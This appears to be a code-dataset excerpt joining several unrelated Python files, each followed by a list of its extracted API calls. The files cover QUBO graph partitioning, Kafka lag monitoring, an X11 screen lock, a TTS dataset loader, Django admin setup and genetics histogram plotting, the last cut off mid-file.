({'a', 'b', 'c'}, {'d', 'e', 'f'})
"""
if not isinstance(solution, dict):
solution = dict(enumerate(solution))
partition1 = set(
self._index_to_vertex[i] for i, v in solution.items() if v == 1
)
partition2 = set(
self._index_to_vertex[i] for i, v in solution.items() if v != 1
)
return partition1, partition2
def is_solution_valid(self, solution, spin=False):
"""is_solution_valid.
Returns whether or not the proposed solution has an equal number of
vertices in each partition. NOTE: this is impossible if the number of
edges is odd!
Parameters
----------
solution : iterable or dict.
solution can be the output of GraphPartitioning.convert_solution,
or the QUBO or QUSO solver output. The QUBO solution output
is either a list or tuple where indices specify the label of the
variable and the element specifies whether it's 0 or 1 for QUBO
(or 1 or -1 for QUSO), or it can be a dictionary that maps the
label of the variable to is value.
spin : bool (optional, defaults to False).
`spin` indicates whether ``solution`` is the solution to the
boolean {0, 1} formulation of the problem or the spin {1, -1}
formulation of the problem. This parameter usually does not matter,
and it will be ignored if possible. The only time it is used is if
``solution`` contains all 1's. In this case, it is unclear whether
``solution`` came from a spin or boolean formulation of the
problem, and we will figure it out based on the ``spin`` parameter.
Return
------
valid : boolean.
True if the proposed solution is valid, else False.
"""
not_converted = (
not isinstance(solution, tuple) or len(solution) != 2 or
not isinstance(solution[0], set) or
not isinstance(solution[1], set)
)
if not_converted:
solution = self.convert_solution(solution, spin)
return len(solution[0]) == len(solution[1])
| [
"qubovert.utils.QUSOMatrix",
"qubovert.PCSO"
] | [((7586, 7598), 'qubovert.utils.QUSOMatrix', 'QUSOMatrix', ([], {}), '()\n', (7596, 7598), False, 'from qubovert.utils import QUSOMatrix\n'), ((7647, 7653), 'qubovert.PCSO', 'PCSO', ([], {}), '()\n', (7651, 7653), False, 'from qubovert import PCSO\n')] |
#!/usr/bin/python
import requests
def check():
data = {}
consumers = requests.get('http://localhost:9000/consumers').json()
for consumer_group in consumers:
consumer_infos = requests.get(
'http://localhost:9000/consumers/{consumer_group}'.format(
consumer_group=consumer_group)).json()
for partition in consumer_infos['partition_assignment']:
data[
'{consumer_group}-{topic}-{partition}-lag'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['lag']
data[
'{consumer_group}-{topic}-{partition}-log_end_offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['log_end_offset']
data[
'{consumer_group}-{topic}-{partition}-offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['offset']
print(data)
return data
if __name__ == "__main__":
check()
| [
"requests.get"
] | [((81, 128), 'requests.get', 'requests.get', (['"""http://localhost:9000/consumers"""'], {}), "('http://localhost:9000/consumers')\n", (93, 128), False, 'import requests\n')] |
from Xlib import X, display
def lock_screen(display: display.Display, screen_nb: int):
screen = display.screen(screen_nb)
root = screen.root
display_width = screen.width_in_pixels
display_height = screen.height_in_pixels
window = root.create_window(0, 0, display_width, display_height,
0, screen.root_depth, window_class=X.CopyFromParent,
visual=screen.root_visual,
override_redirect=1, background_pixel=screen.black_pixel)
pixmap = window.create_pixmap(8, 8, 1)
invisible_cursor = pixmap.create_cursor(pixmap, (0, 0, 0), (0, 0, 0), 0, 0)
window.change_attributes(cursor=invisible_cursor) # what XDefineCursor does under the hood
pointer_mask = X.ButtonPressMask | X.ButtonReleaseMask | X.PointerMotionMask
window.grab_pointer(False, event_mask=pointer_mask,
pointer_mode=X.GrabModeAsync, keyboard_mode=X.GrabModeAsync,
confine_to=X.NONE, cursor=invisible_cursor, time=X.CurrentTime)
window.grab_keyboard(True, pointer_mode=X.GrabModeAsync,
keyboard_mode=X.GrabModeAsync, time=X.CurrentTime)
window.map()
def lock(display: display.Display):
for screen in range(display.screen_count()):
lock_screen(display, screen)
display.sync()
| [
"Xlib.display.screen_count",
"Xlib.display.screen",
"Xlib.display.sync"
] | [((102, 127), 'Xlib.display.screen', 'display.screen', (['screen_nb'], {}), '(screen_nb)\n', (116, 127), False, 'from Xlib import X, display\n'), ((1356, 1370), 'Xlib.display.sync', 'display.sync', ([], {}), '()\n', (1368, 1370), False, 'from Xlib import X, display\n'), ((1290, 1312), 'Xlib.display.screen_count', 'display.screen_count', ([], {}), '()\n', (1310, 1312), False, 'from Xlib import X, display\n')] |
import torch
import torch.utils.data as data
from glob import glob
from os.path import join, basename, exists
import numpy as np
import pickle as pkl
from random import random
class KETTS76(data.Dataset):
def __init__(self, which_set='train', datapath='/home/thkim/data/KETTS76/bin_22050'):
# Load vocabulary
self.__dict__.update(locals())
vocab_path = datapath + '/vocab_dict.pkl'
self.vocab_dict = pkl.load(open(vocab_path, 'rb'))
self.vocab_size = len(self.vocab_dict)
self.num_spkr = 6
# Filelist
self.txtlist = np.sort(glob(datapath+'/*.txt'))
self.mellist = np.sort(glob(datapath+'/*.mel'))
if which_set == 'train':
self.txtlist = [xx for xx in self.txtlist if int(xx.split('_')[-1][:-4]) < 490]
self.mellist = [xx for xx in self.mellist if int(xx.split('_')[-1][:-4]) < 490]
elif which_set == 'val':
self.txtlist = [xx for xx in self.txtlist if int(xx.split('_')[-1][:-4]) >= 490]
self.mellist = [xx for xx in self.mellist if int(xx.split('_')[-1][:-4]) >= 490]
else:
raise ValueError
self.dbname = 'KETTS76'
self.gen_lu = {'f': 0, 'm': 1}
self.age_lu = {'age20': 0, 'age30': 1, 'age40': 2, 'age50': 3, 'age60': 4}
self.emo_lu = {'neu': 0, 'hap': 1, 'sad': 2, 'ang': 3, 'sur': 4, 'fea': 5, 'dis': 6}
self.spkr_dict = ['20m', '30f', '40m', '50m', '50f', '60f']
self.spkr_lu = {'_'.join((self.dbname, self.spkr_dict[ii])): xx for ii, xx in enumerate(range(self.num_spkr))}
assert len(self.txtlist)==len(self.mellist), \
'mellist({}) and txtlist({}) has different length'.format(len(self.mellist), len(self.txtlist))
self.char2onehot = lambda x : self.vocab_dict[x] if x in self.vocab_dict.keys() else None
def __len__(self):
return len(self.txtlist)
def __getitem__(self, idx):
# Text read
with open(self.txtlist[idx], 'r') as f:
txt = f.readline()
txt_feat = list(filter(None, [self.char2onehot(xx) for xx in txt]))
# Mel/Lin read
mellin = pkl.load(open(self.mellist[idx], 'rb'))
mel = mellin['mel']
#lin = mellin['lin']
target_mel_name = basename(self.mellist[idx])
spk, emo, _, _, sent_no = target_mel_name[:-4].split('_')
while True:
new_sent = np.random.randint(500)
style_mel_name = f'{spk}_{emo}_500_trim_{new_sent:05}.mel'
style_mel_path = join(self.datapath, style_mel_name)
if exists(style_mel_path):
break
while True:
new_emo = np.random.choice(list(self.emo_lu.keys()))
new_spk = np.random.choice(self.spkr_dict)
contents_mel_name = f'{new_spk}_{new_emo}_500_trim_{sent_no}.mel'
contents_mel_path = join(self.datapath, contents_mel_name)
if exists(contents_mel_path):
break
contents_mel = pkl.load(open(contents_mel_path, 'rb'))['mel']
style_mel = pkl.load(open(style_mel_path, 'rb'))['mel']
style = self.getstyle(self.txtlist[idx])
return {'txt': np.asarray(txt_feat),
'style': style,
#'target_lin': np.asarray(lin),
'target_mel': np.asarray(mel),
'style_mel': np.asarray(style_mel),
'contents_mel': np.asarray(contents_mel),
'filename': {'target':self.mellist[idx], 'style':style_mel_path, 'input':contents_mel_path}
}
def getstyle(self, filename):
filename = basename(filename)
spkr, emo = basename(filename).split('_')[:2]
gender = self.gen_lu[spkr[2]]
age = self.age_lu[f'age{spkr[:2]}']
emotion = self.emo_lu[emo]
spkr = self.spkr_lu['_'.join((self.dbname, spkr))]
return {'age': age, 'gender': gender,'emotion': emotion, 'dbname': self.dbname, 'spkr': spkr}
def get_vocab_size(self):
return self.vocab_size
def set_vocab_dict(self, vocab_dict):
self.vocab_dict = vocab_dict
self.vocab_size = len(vocab_dict)
self.char2onehot = lambda x : self.vocab_dict[x] if x in self.vocab_dict.keys() else None
def set_spkr_lu(self, spkr_lu):
self.spkr_lu = spkr_lu
if __name__=='__main__':
aa = KETTS76()
aa[0]
import ipdb
ipdb.set_trace()
| [
"os.path.exists",
"ipdb.set_trace",
"numpy.random.choice",
"os.path.join",
"numpy.asarray",
"numpy.random.randint",
"os.path.basename",
"glob.glob"
] | [((4439, 4455), 'ipdb.set_trace', 'ipdb.set_trace', ([], {}), '()\n', (4453, 4455), False, 'import ipdb\n'), ((2296, 2323), 'os.path.basename', 'basename', (['self.mellist[idx]'], {}), '(self.mellist[idx])\n', (2304, 2323), False, 'from os.path import join, basename, exists\n'), ((3660, 3678), 'os.path.basename', 'basename', (['filename'], {}), '(filename)\n', (3668, 3678), False, 'from os.path import join, basename, exists\n'), ((595, 620), 'glob.glob', 'glob', (["(datapath + '/*.txt')"], {}), "(datapath + '/*.txt')\n", (599, 620), False, 'from glob import glob\n'), ((651, 676), 'glob.glob', 'glob', (["(datapath + '/*.mel')"], {}), "(datapath + '/*.mel')\n", (655, 676), False, 'from glob import glob\n'), ((2436, 2458), 'numpy.random.randint', 'np.random.randint', (['(500)'], {}), '(500)\n', (2453, 2458), True, 'import numpy as np\n'), ((2559, 2594), 'os.path.join', 'join', (['self.datapath', 'style_mel_name'], {}), '(self.datapath, style_mel_name)\n', (2563, 2594), False, 'from os.path import join, basename, exists\n'), ((2610, 2632), 'os.path.exists', 'exists', (['style_mel_path'], {}), '(style_mel_path)\n', (2616, 2632), False, 'from os.path import join, basename, exists\n'), ((2764, 2796), 'numpy.random.choice', 'np.random.choice', (['self.spkr_dict'], {}), '(self.spkr_dict)\n', (2780, 2796), True, 'import numpy as np\n'), ((2907, 2945), 'os.path.join', 'join', (['self.datapath', 'contents_mel_name'], {}), '(self.datapath, contents_mel_name)\n', (2911, 2945), False, 'from os.path import join, basename, exists\n'), ((2961, 2986), 'os.path.exists', 'exists', (['contents_mel_path'], {}), '(contents_mel_path)\n', (2967, 2986), False, 'from os.path import join, basename, exists\n'), ((3218, 3238), 'numpy.asarray', 'np.asarray', (['txt_feat'], {}), '(txt_feat)\n', (3228, 3238), True, 'import numpy as np\n'), ((3353, 3368), 'numpy.asarray', 'np.asarray', (['mel'], {}), '(mel)\n', (3363, 3368), True, 'import numpy as np\n'), ((3399, 3420), 'numpy.asarray', 
'np.asarray', (['style_mel'], {}), '(style_mel)\n', (3409, 3420), True, 'import numpy as np\n'), ((3454, 3478), 'numpy.asarray', 'np.asarray', (['contents_mel'], {}), '(contents_mel)\n', (3464, 3478), True, 'import numpy as np\n'), ((3699, 3717), 'os.path.basename', 'basename', (['filename'], {}), '(filename)\n', (3707, 3717), False, 'from os.path import join, basename, exists\n')] |
from django.contrib import admin
from .models import User, Category, Listing, WatchList, Bid, Comment
admin.site.register(User)
admin.site.register(Category)
admin.site.register(WatchList)
class ListingAdmin(admin.ModelAdmin):
list_display = ('title', 'username', 'price', 'status')
admin.site.register(Listing, ListingAdmin)
class CommentAdmin(admin.ModelAdmin):
list_display = ('listing', 'username', 'active')
admin.site.register(Comment, CommentAdmin)
class BidAdmin(admin.ModelAdmin):
list_display = ('listing', 'username', 'bidprice', 'bidstatus', 'completed')
admin.site.register(Bid, BidAdmin)
| [
"django.contrib.admin.site.register"
] | [((103, 128), 'django.contrib.admin.site.register', 'admin.site.register', (['User'], {}), '(User)\n', (122, 128), False, 'from django.contrib import admin\n'), ((129, 158), 'django.contrib.admin.site.register', 'admin.site.register', (['Category'], {}), '(Category)\n', (148, 158), False, 'from django.contrib import admin\n'), ((159, 189), 'django.contrib.admin.site.register', 'admin.site.register', (['WatchList'], {}), '(WatchList)\n', (178, 189), False, 'from django.contrib import admin\n'), ((291, 333), 'django.contrib.admin.site.register', 'admin.site.register', (['Listing', 'ListingAdmin'], {}), '(Listing, ListingAdmin)\n', (310, 333), False, 'from django.contrib import admin\n'), ((428, 470), 'django.contrib.admin.site.register', 'admin.site.register', (['Comment', 'CommentAdmin'], {}), '(Comment, CommentAdmin)\n', (447, 470), False, 'from django.contrib import admin\n'), ((589, 623), 'django.contrib.admin.site.register', 'admin.site.register', (['Bid', 'BidAdmin'], {}), '(Bid, BidAdmin)\n', (608, 623), False, 'from django.contrib import admin\n')] |
"""Flexible code for histogramming per-snp and per-replica statistics for selected SNPs in selected replicas in
selected scenarios and/or demographies."""
from Operations.Shari_Operations.localize.Scenario import GetScenarios, GetSelectionScenarios
from Operations.MiscUtil import Dict, compile_expr, dbg, Histogrammer, AddFileSfx, ReplaceFileExt, \
MergeDicts, MakeSeq, SlurpFile, IsSeq, Sfx, MakeAlphaNum, DictGet, tmap, PrintDictDiff
from Classes.DotData import DotData
from Operations.Ilya_Operations.PipeRun.python.PipeRun import GetDependsOn
from Operations.Shari_Operations.localize.PopConsts import AllFreqs, AllPops, AllAges, CAUSAL_POS
from Operations.IDotData import IDotData
import operator, os, logging, contextlib, functools, collections, types, ast
from itertools import izip
import itertools, string
from UserDict import DictMixin
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as pp
import numpy as np
import math
import traceback as tb
__all__ = ( 'gatherCausalFreqs', 'DefineRulesTo_gatherCausalFreqs', 'histogramSnpStatistic', 'histogramReplicaStatistic',
'AddUpHistograms', 'GraphHistograms', 'GraphCumulPlots', 'DefineRulesTo_histogramSnpStatistic',
'DefineRulesTo_histogramReplicaStatistic', 'findReplicasMatchingConds', 'findSnpsMatchingConds',
'identifyReplicasMeetingConds', 'splitSnpStatsFile',
'DefineRulesTo_identifyReplicasMeetingCommonConds' )
def gatherCausalFreqs( scen, Ddata, simsOut, thinSfx, thinExt, nreplicas, getio = None ):
    """For all replicas within one scenario, gather some useful summary info for each replica:
    e.g. that replica's modern-day frequency of the causal allele, the genetic map position of the
    causal SNP, number of SNPs in the replica, the range of the genetic map, etc.

    Reads the cosi .pos file of each replica, looks up the frequency of allele 1 at the fixed
    causal position (500000), and writes one row per replica to
    <Ddata>/replicastats<thinSfx>/<scenDir>/replicaStats.tsv with columns
    ( replicaNum, causalAlleleFreq, targetCausalFreq ).  For neutral scenarios the
    causal frequency is recorded as NaN.

    Params:
       scen      - the Scenario object (selection or neutral)
       Ddata     - root of the simulation data directory
       simsOut   - name of the simulation-output subdirectory under Ddata
       thinSfx   - suffix identifying a thinned version of the data
       thinExt   - extension appended to the .pos file names
       nreplicas - number of replicas simulated for this scenario
       getio     - if true, return this rule's input/output description instead of running
    """
    #hm3big/simsOutHm3big/10ky/sel100_1/
    simScenDir = Ddata + '/' + simsOut + thinSfx + '/' + scen.scenDir()
    statScenDir = Ddata + '/replicastats' + thinSfx + '/' + scen.scenDir()
    # one .pos file per replica; neutral scenarios have no causal SNP, hence no inputs
    posFileNames = [ simScenDir + '/' + '%d_%s.pos-%d%s' % ( replicaNum, scen.scenName(), scen.mutPop, thinExt )
                     for replicaNum in range( nreplicas ) ] if not scen.is_neutral() else []
    replicaInfoFileName = statScenDir + '/replicaStats.tsv'
    if getio: return dict( depends_on = posFileNames, creates = replicaInfoFileName,
                           mediumRuleNameSfx = scen )
    causalAlleleFreqs = [ ]
    replicaNums = [ ]
    # the causal mutation is always placed at position 500000 in these simulations
    selpos = 500000
    okReplicas = 0   # NOTE(review): never updated or read below -- appears vestigial
    for replicaNum in range( nreplicas ):
        if scen.is_neutral(): causalFreq = np.nan
        else:
            # .pos file format: one line per SNP with both allele frequencies
            posFile = DotData( SVPath = posFileNames[ replicaNum ], SVSkipFirstLines = 1, SVHeader = False,
                               names = ['SNP','CHROM', 'CHROM_POS', 'ALLELE1', 'FREQ1', 'ALLELE2', 'FREQ2' ] )
            causalLine = posFile[ posFile.CHROM_POS == selpos ]
            # exactly one SNP must sit at the causal position
            assert len( causalLine ) == 1
            causalFreq = causalLine[0].FREQ1
        causalAlleleFreqs.append( causalFreq )
        replicaNums.append( replicaNum )
    DotData( names = [ 'replicaNum', 'causalAlleleFreq', 'targetCausalFreq' ],
             Columns = [ replicaNums, causalAlleleFreqs,
                         (( 0 if scen.isNeutral() else scen.mutFreq),)*nreplicas ] ).saveToSV( replicaInfoFileName )
def gatherReplicaGDstats( scen, Ddata, simsOut, thinSfx, thinExt, nreplicas, getio = None ):
    """For all replicas within each scenario, gather some genetic map-related info for each replica:
    e.g. the genetic map position of the
    causal SNP, the range of the genetic map, etc.

    NOTE(review): this function appears unfinished -- it declares its inputs/outputs via getio
    and initializes a few locals, but never reads the .pos files nor writes
    replicaInfoFileName.  Confirm its status before wiring it into a pipeline.
    """
    #hm3big/simsOutHm3big/10ky/sel100_1/
    simScenDir = os.path.join( Ddata, simsOut + thinSfx, scen.scenDir() )
    statScenDir = os.path.join( Ddata, 'replicastats' + thinSfx, scen.scenDir() )
    # one cosi .pos file per replica; neutral scenarios have none
    posFileNames = [ simScenDir + '/' + '%d_%s.pos-%d%s' % ( replicaNum, scen.scenName(), scen.mutPop, thinExt )
                     for replicaNum in range( nreplicas ) ] if not scen.is_neutral() else []
    replicaInfoFileName = statScenDir + '/replicaStats.tsv'
    if getio: return dict( depends_on = posFileNames, creates = replicaInfoFileName,
                           mediumRuleNameSfx = scen )
    causalAlleleFreqs = [ ]
    replicaNums = [ ]
    selpos = 500000
def DefineRulesTo_gatherCausalFreqs( pr, Ddata, simsOut = 'simsOut',
                                     mutAges = AllAges, mutPops = AllPops, mutFreqs = AllFreqs,
                                     thinSfx = '', thinExt = '', nreplicas = 100 ):
    """Define rules to gather per-replica statistics.

    Adds one pipeline rule per scenario (cartesian product of mutAges x mutPops x mutFreqs,
    plus the neutral scenario, as produced by GetScenarios).  Each rule invokes
    gatherReplicaStats (an alias of gatherCausalFreqs).

    NOTE: Dict( 'scen Ddata ...' ) picks up the caller's local variables by name, so the
    loop variable must stay named 'scen'.
    """
    for scen in GetScenarios( mutAges, mutPops, mutFreqs ):
        pr.addInvokeRule( invokeFn = gatherReplicaStats,
                          invokeArgs = Dict( 'scen Ddata simsOut thinSfx thinExt nreplicas' ) )
# Backward-compatibility aliases: older pipeline definitions refer to these
# functions under their previous names; keep them pointing at the renamed versions.
gatherReplicaStats = gatherCausalFreqs
DefineRulesTo_gatherReplicaStats = DefineRulesTo_gatherCausalFreqs
def histogramSnpStatistic( Ddata, thinSfx, scenDir, replicaTables, replicaCond, snpTables, snpCond, snpStat,
                           outFile, nreplicas, binSize, binShift = 0.0, sfx = None, scenSfx = None, getio = None ):
    """Compute histogram of $snpStat for snps matching $snpCond in replicas matching $replicaCond in scenario $scenDir.

    replicaCond and snpCond are Python expressions evaluated with each replica/snp table name bound
    to that table's current row; snpStat is an expression giving the value to histogram.
    Writes the histogram (and a companion 'stats'-suffixed summary file) to outFile.

    Params:
       statTable - the name of the per-snp statistics table.  we assume there is a file called
          Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
       statCol - column name to histogram.
    """
    replicaTables = MakeSeq( replicaTables )
    snpTables = MakeSeq( snpTables )
    # pre-compile the user-supplied expressions once; they are eval'd per row below
    replicaCondExpr = compile_expr( replicaCond )
    snpCondExpr = compile_expr( snpCond )
    snpStatExpr = compile_expr( snpStat )
    outFile = AddFileSfx( outFile, sfx )
    outFileStats = AddFileSfx( outFile, 'stats' )
    if IsSeq( scenSfx ): scenSfx = dict( scenSfx )
    replicaTableFiles = [ os.path.join( Ddata, 'replicastats' + thinSfx, scenDir,
                                        replicaTable + ( '.tsv' if '.' not in replicaTable else '' ) )
                          for replicaTable in replicaTables ]
    # per-snp tables may carry a scenario-specific suffix, either one string for all tables
    # or a per-table mapping
    snpTableFiles = [ os.path.join( Ddata, 'snpStats' + thinSfx, scenDir,
                                    AddFileSfx( snpTable + ( '.tsv' if '.' not in snpTable else '' ),
                                                scenSfx if isinstance( scenSfx, types.StringTypes )
                                                else scenSfx[ os.path.splitext( snpTable )[0] ] ) )
                      for snpTable in snpTables ]
    # .data paths denote directory-backed tables; mark them with a trailing slash
    replicaTableFiles = [ f + '/' if f.endswith('.data') else f for f in replicaTableFiles ]
    snpTableFiles = [ f + '/' if f.endswith('.data') else f for f in snpTableFiles ]
    snpTables = [ os.path.splitext(snpTable)[0] for snpTable in snpTables ]
    if getio: return dict( depends_on = replicaTableFiles + snpTableFiles,
                           # reuse the value computed above (was recomputed inline)
                           creates = ( outFile, outFileStats ),
                           attrs = Dict( 'scenDir snpCond replicaCond snpStat' ),
                           mediumRuleNameSfx = ( scenDir, scenSfx ) )
    replicaTableVals = [ DotData( SVPath = f ) for f in replicaTableFiles ]
    # evaluate the replica condition once per replica, over the parallel replica tables
    replicasToUse = [ eval( replicaCondExpr, globals(), dict( zip( replicaTables, replicaTableRows ) ) )
                      for replicaTableRows in izip( *replicaTableVals ) ]
    snpTableVals = [ IDotData( SVPath = f ) for f in snpTableFiles ]
    histogramBuilder = Histogrammer( binSize = binSize, binShift = binShift )
    lastReplica = np.nan
    for snpTableRows in izip( *snpTableVals ):
        r0 = snpTableRows[ 0 ]
        # sanity check: the parallel snp tables must stay aligned on (Chrom, Pos)
        assert all([ r.Chrom == r0.Chrom for r in snpTableRows ]) or all([ np.isnan( r.Chrom ) for r in snpTableRows ])
        assert all([ r.Pos == r0.Pos for r in snpTableRows ])
        replica = int( r0.Chrom ) if not np.isnan( r0.Chrom ) else -1
        useThisReplica = not replicaTables or replicasToUse[ replica ]
        if replica != lastReplica: dbg( 'replica useThisReplica histogramBuilder.getNumVals()' )
        if useThisReplica:
            snpDict = dict( zip( snpTables, snpTableRows ) )
            if eval( snpCondExpr, globals(), snpDict ):
                val = eval( snpStatExpr, globals(), snpDict )
                histogramBuilder.addVal( val )
        lastReplica = replica
    # FIX: the original passed outFile as a lazy %-format arg without a placeholder,
    # so the file name was never logged (logging reported a formatting error instead)
    logging.info( 'saving histogram to %s', outFile )
    histogramBuilder.save( outFile )
def histogramReplicaStatistic( Ddata, thinSfx, replicaCond, replicaStat,
                               outFile, nreplicas, binSize, scenCond = 'True',
                               replicaTables = None,
                               scen2sfxs = {}, allScens = GetScenarios(),
                               sfx = None, replicaCondSfx = '',
                               nameSfx = '', getio = None ):
    """Compute histogram of $replicaStat for replicas matching $replicaCond in scenarios matching $scenCond.
    Saves the histogram as well as overall stats about the values of this statistic, e.g. the average
    (Histogrammer.save writes both outFile and the 'stats'-suffixed companion file).

    replicaCond / replicaStat are Python expressions over the per-replica tables named in
    replicaTables; findReplicasMatchingConds does the actual selection and evaluation.

    NOTE(review): allScens / scen2sfxs use mutable-ish defaults evaluated once at import time;
    callers normally pass explicit values.

    Params:
       statTable - the name of the per-snp statistics table.  we assume there is a file called
          Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
       statCol - column name to histogram.
    """
    outFile = AddFileSfx( outFile, sfx, replicaCondSfx )
    outFileStats = AddFileSfx( outFile, 'stats' )
    # Dict() pulls the named local variables from this frame -- keep these names unchanged
    args = Dict( 'Ddata thinSfx replicaTables scenCond replicaCond scen2sfxs allScens' )
    if getio: return dict( depends_on =
                           findReplicasMatchingConds( getio = True, **args )[ 'depends_on' ],
                           creates = ( outFile, outFileStats ),
                           mediumRuleNameSfx = sfx, attrs = dict( piperun_short = True ),
                           name = 'histogramReplicaStatistic' + Sfx( nameSfx ) )
    histogramBuilder = Histogrammer( binSize = binSize )
    histogramBuilder.addVals( findReplicasMatchingConds( showHeadings = 'val', showVals = replicaStat, **args ).val )
    histogramBuilder.save( outFile )
def histogramSnpStatistic2( Ddata, thinSfx, snpTables, snpCond, snpCondSfx, replicaTables, replicaCond, replicaStat,
                            outFile, nreplicas, binSize, scenCond = 'True',
                            scen2sfxs = {}, allScens = GetScenarios(),
                            sfx = None, replicaCondSfx = '',
                            nameSfx = '', getio = None ):
    """Compute histogram of $replicaStat for replicas matching $replicaCond in scenarios matching $scenCond.
    Saves the histogram as well as overall stats about the values of this statistic, e.g. the average.

    This variant selects individual SNPs (via snpTables/snpCond) rather than whole replicas.

    FIXES(review): the original body called the undefined name 'finSnpsMatchingConds'
    (typo for findSnpsMatchingConds, which this module exports in __all__) and referenced
    an undefined variable 'snpStat' -- the statistic expression is carried in the
    'replicaStat' parameter.  Both raised NameError on every call.
    The rule name string 'histogramReplicaStatistic' is kept as-is, since pipeline
    definitions may refer to it -- presumably it was copied from the function above; verify.

    Params:
       statTable - the name of the per-snp statistics table.  we assume there is a file called
          Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
       statCol - column name to histogram.
    """
    outFile = AddFileSfx( outFile, sfx, replicaCondSfx, snpCondSfx )
    outFileStats = AddFileSfx( outFile, 'stats' )
    # Dict() pulls the named local variables from this frame -- keep these names unchanged
    args = Dict( 'Ddata thinSfx snpTables snpCond replicaTables scenCond replicaCond scen2sfxs allScens' )
    if getio: return dict( depends_on =
                           findSnpsMatchingConds( getio = True, **args )[ 'depends_on' ],
                           creates = ( outFile, outFileStats ),
                           mediumRuleNameSfx = sfx, attrs = dict( piperun_short = True ),
                           name = 'histogramReplicaStatistic' + Sfx( nameSfx ) )
    histogramBuilder = Histogrammer( binSize = binSize )
    histogramBuilder.addVals( findSnpsMatchingConds( showHeadings = 'val', showVals = replicaStat, **args ).val )
    histogramBuilder.save( outFile )
def AddUpHistograms( histFiles, outFile, getio = None ):
    """Sum the histograms stored in the given files and write the combined histogram.

    histFiles - files previously written by Histogrammer.save()
    outFile   - destination for the summed histogram (Histogrammer.save also
                produces the 'stats'-suffixed companion file declared below)
    getio     - if true, return this rule's input/output description instead of running
    """
    outFileStats = AddFileSfx( outFile, 'stats' )
    if getio:
        return dict( depends_on = histFiles,
                     creates = ( outFile, outFileStats ),
                     attrs = dict( piperun_short = True ) )
    loadedHists = map( Histogrammer.load, histFiles )
    combined = reduce( operator.add, loadedHists )
    combined.save( outFile )
def GraphHistograms( histFiles, outFile = None, xlabel = '', ylabel = '', title = '',
                     labels = (), colors = 'brcmygkbrcmygkbrcmygkbrcmygk',
                     relWidth = 0.4,
                     xbound = None, ybound = None, coarsenBy = None, sfx = '',
                     ticksCoarsen = 1, log = False, normed = False,
                     cumulative = False,
                     cumulativeUpTo = None,
                     figSize = (24, 12 ),
                     subplots_adjust = {},
                     getio = None ):
    """Plot one or more histograms sharing the same bins, as two stacked subplots:
    the top subplot cumulative, the bottom non-cumulative.

    NOTE(review): the 'cumulative' parameter is shadowed by the subplot loop variable
    below, so its passed-in value has no effect -- both variants are always drawn.

    Params:
       normalizeHistograms - if true, for each histogram on the y-axis we plot not the number of
         items in a given bin, but their fraction out of the total number of items in that histogram.
         This lets us compare different histograms.
    """
    # ( if the bins of one are strictly finer than bins of other, i.e. if they form a DAG in this
    #  relationship, then we can still do the graph).
    histFiles = MakeSeq( histFiles )
    if not outFile:
        assert len( histFiles ) == 1
        outFile = ReplaceFileExt( histFiles[0], '.png' )
    outFile = AddFileSfx( outFile, sfx )
    # default labels: the bare file names of the histogram files
    if not labels: labels = [ os.path.splitext( os.path.basename( f ) )[0] for f in histFiles ]
    if getio: return dict( depends_on = histFiles, creates = outFile,
                           mediumRuleNameSfx = sfx,
                           attrs = dict( piperun_short = True ) )
    pp.figure(1, figsize = figSize )
    #pp.clf()
    pp.subplots_adjust( **MergeDicts( dict( hspace = 0.3, bottom = 0.15 ), subplots_adjust ) )
    # subplot 1: cumulative; subplot 2: per-bin counts (shadows the 'cumulative' param)
    for which, cumulative in enumerate( ( True, False ) ):
        pp.subplot( 2, 1, which + 1 )
        pp.xlabel( xlabel )
        pp.ylabel( ylabel )
        pp.hold( True )
        binSize = None
        binShift = None
        theLabels = []
        theHandles = []
        hists = map( Histogrammer.load, histFiles )
        if coarsenBy: hists = [ hist.coarsenBy( coarsenBy ) for hist in hists ]
        # union of bin ids across all histograms, so every bar series spans the same x range
        allBinIds = reduce( operator.concat, [ hist.bin2count.keys() for hist in hists ] )
        if not allBinIds: allBinIds = ( 0, )
        minBinId = min( allBinIds )
        maxBinId = max( allBinIds ) + 1
        # optionally truncate the x range once the cumulative fraction reaches cumulativeUpTo
        if cumulativeUpTo is not None:
            maxBinId = min( maxBinId, max( [ hist.getCumulativeBinFor( cumulativeUpTo ) for hist in hists ] ) ) + 1
        for color, label, ( histFileNum, hist ) in zip( colors, labels, enumerate( hists ) ):
            # check that all histograms we're loading have the same bins
            if binSize is None: binSize = hist.binSize
            else: assert abs( hist.binSize - binSize ) < 1e-12
            if binShift is None: binShift = hist.binShift
            else: assert abs( hist.binShift - binShift ) < 1e-12
            # side-by-side bars: each histogram gets an offset slice of the bin width
            width = binSize * relWidth / len( histFiles )
            left = np.array( hist.getAllBinLefts( minBinId = minBinId, maxBinId = maxBinId ) ) + histFileNum * width
            if histFileNum == 0: pp.xticks( [ x for i, x in enumerate( left ) if i % ticksCoarsen == 0 ] )
            height = hist.getAllBinCounts( normed = normed, cumulative = cumulative,
                                           minBinId = minBinId, maxBinId = maxBinId )
            rects = pp.bar( height = height,
                            width = width * 0.95, **Dict( 'left color log' ) )
            if rects:
                # annotate each legend entry with how many values (and nans/infs) it summarizes
                labelHere = label + ' (%d values)' % hist.getNumVals()
                if hist.getNumNaNs(): labelHere += ' (%d nans)' % hist.getNumNaNs()
                if hist.getNumInfs(): labelHere += ' (%d infs)' % hist.getNumInfs()
                rects[ 0 ].set_label( labelHere )
                theLabels.append( labelHere )
                theHandles.append( rects[0] )
        pp.title( title )
        if theLabels and theHandles:
            pp.figlegend( loc = 'lower center', labels = theLabels, handles = theHandles )
        if xbound: pp.gca().set_xbound( *xbound )
        if ybound: pp.gca().set_ybound( *ybound )
    pp.savefig( outFile )
def GraphCumulPlots( histFiles, outFile = None, xlabel = '', ylabel = '', title = '',
                     labels = (), colors = 'brcmygkbrcmygkbrcmygkbrcmygk',
                     relWidth = 0.4,
                     xbound = None, ybound = None, coarsenBy = None, sfx = '',
                     ticksCoarsen = 1, log = False, normed = True,
                     getio = None ):
    """Plot one or more cumulative plots, one line per histogram file, sharing bins.

    Also writes the plotted (binLefts, binCounts) points to outFile + '.points.tsv'.
    NOTE(review): that table is rewritten inside the loop, so with several histFiles
